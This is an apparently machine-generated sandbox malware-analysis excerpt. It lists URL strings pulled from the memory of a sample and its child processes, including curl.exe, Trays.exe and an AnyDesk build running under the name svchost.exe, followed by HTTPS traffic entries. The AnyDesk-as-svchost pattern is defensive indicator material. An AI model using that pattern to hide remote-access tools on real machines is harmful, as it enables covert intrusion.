    Source: driver.exe, 00000028.00000002.20433555662.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_next.html
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_next.html03b
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_next.html;
    Source: Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_next.html???????...e&
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_next.htmlg&
    Source: Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_order.html
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_order.html03b
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E12000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.4t-niagara.com/tray_order.htmlU
    Source: curl.exe, 00000023.00000003.20325593592.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000002.20327686955.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.20325554267.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.blat.net/h
    Source: driver.exe, 00000028.00000003.20430251957.0000000002E12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gimp.org/xmp/
    Source: driver.exe, 00000028.00000003.20430251957.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.innosetup.com/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opengl.org/registry/
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/)
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, curl.exe, 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326809234.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20361147934.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20386342714.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394831572.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20417147081.0000000000324000.00000008.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326809234.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20361147934.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20386342714.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394831572.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20417147081.0000000000324000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html..
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalue
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pdf-tools.com
    Source: driver.exe, 00000028.00000003.20430251957.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/ps
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000030.00000003.20534656140.00000000040D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/company#imprint
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/contact/sales
    Source: AnyDesk.exe, 00000030.00000003.20534656140.00000000040D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/contact/sales)
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/de/datenschutz
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/en/assembly
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/en/assembly/terms
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/en/changelog/windows
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/en/privacy
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/es/privacidad
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/order
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/pricing/teams
    Source: AnyDesk.exe, 00000030.00000003.20534656140.00000000040D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/pricing/teams)
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/privacy
    Source: svchost.exeString found in binary or memory: https://anydesk.com/terms
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://anydesk.com/update
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boot.net.anydesk.comabcdefABCDEFtruefalsetfInvalid
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://help.anydesk.com
    Source: svchost.exeString found in binary or memory: https://help.anydesk.com/
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://help.anydesk.com/$
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://help.anydesk.com/HelpLinkInstallLocationAnyDesk
    Source: svchost.exe, 0000002A.00000003.20527962526.000000000404E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000003.20528041970.000000000404F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000003.20527754907.000000000404C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/e
    Source: svchost.exeString found in binary or memory: https://my.anydesk.com
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/login-actions/reset-credentials
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/login-actions/reset-credentials?client_id=myanydesk-fro
    Source: svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/auth/realms/myanydesk/protocol/openid-connect/registrations?client_id=myanyde
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://my.anydesk.com/password-generator.
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.com/v2
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://order.anydesk.com/trial
    Source: svchost.exeString found in binary or memory: https://policies.google.com/privacy?hl=$
    Source: svchost.exe, 0000002D.00000003.20482670551.00000000040EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.
    Source: svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/account-migration
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-account
    Source: svchost.exeString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-for-android-chromeos#troubleshooting
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/anydesk-id-and-alias
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/license-expired-error
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/my-anydesk-ii#user-management
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/pause-session
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/quick-start-guide
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/status-anynet_overload
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/status-desk_rt_auto_disconnect
    Source: svchost.exeString found in binary or memory: https://support.anydesk.com/knowledge/status-desk_rt_ipc_error
    Source: svchost.exeString found in binary or memory: https://support.anydesk.com/knowledge/the-session-has-ended-unexpectedly
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/users
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/waiting-for-image-black-screen
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://support.anydesk.com/knowledge/what-is-full-client-management
    Source: curl.exe, 00000027.00000003.20415977425.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417989459.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20415827647.0000000000966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
    Source: curl.exe, 00000027.00000003.20415977425.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000002.20417989459.0000000000966000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20415827647.0000000000966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/03
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.google.com/intl/$
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51548
    Source: unknownNetwork traffic detected: HTTP traffic on port 53348 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 62842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61072
    Source: unknownNetwork traffic detected: HTTP traffic on port 63457 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63297 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 62880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56798
    Source: unknownNetwork traffic detected: HTTP traffic on port 57238 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59675
    Source: unknownNetwork traffic detected: HTTP traffic on port 52387 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58342
    Source: unknownNetwork traffic detected: HTTP traffic on port 53873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57559 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62279
    Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
    Source: unknownNetwork traffic detected: HTTP traffic on port 52161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53380 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50462
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58227
    Source: unknownNetwork traffic detected: HTTP traffic on port 61267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64969 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51950
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60388
    Source: unknownNetwork traffic detected: HTTP traffic on port 61614 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52371
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50590
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50906
    Source: unknownNetwork traffic detected: HTTP traffic on port 58048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61052 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62842
    Source: unknownNetwork traffic detected: HTTP traffic on port 64557 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58637
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52413
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53348
    Source: unknownNetwork traffic detected: HTTP traffic on port 62750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54710
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49420 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61086
    Source: unknownNetwork traffic detected: HTTP traffic on port 58970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61880
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62695
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62453
    Source: unknownNetwork traffic detected: HTTP traffic on port 52559 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64995
    Source: unknownNetwork traffic detected: HTTP traffic on port 65270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53517
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52823
    Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52413 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52387
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57559
    Source: unknownNetwork traffic detected: HTTP traffic on port 62453 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54685
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51731
    Source: unknownNetwork traffic detected: HTTP traffic on port 54856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53517 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64527
    Source: unknownNetwork traffic detected: HTTP traffic on port 64605 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64889
    Source: unknownNetwork traffic detected: HTTP traffic on port 58342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63674
    Source: unknownNetwork traffic detected: HTTP traffic on port 60388 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64886
    Source: unknownNetwork traffic detected: HTTP traffic on port 64995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63290
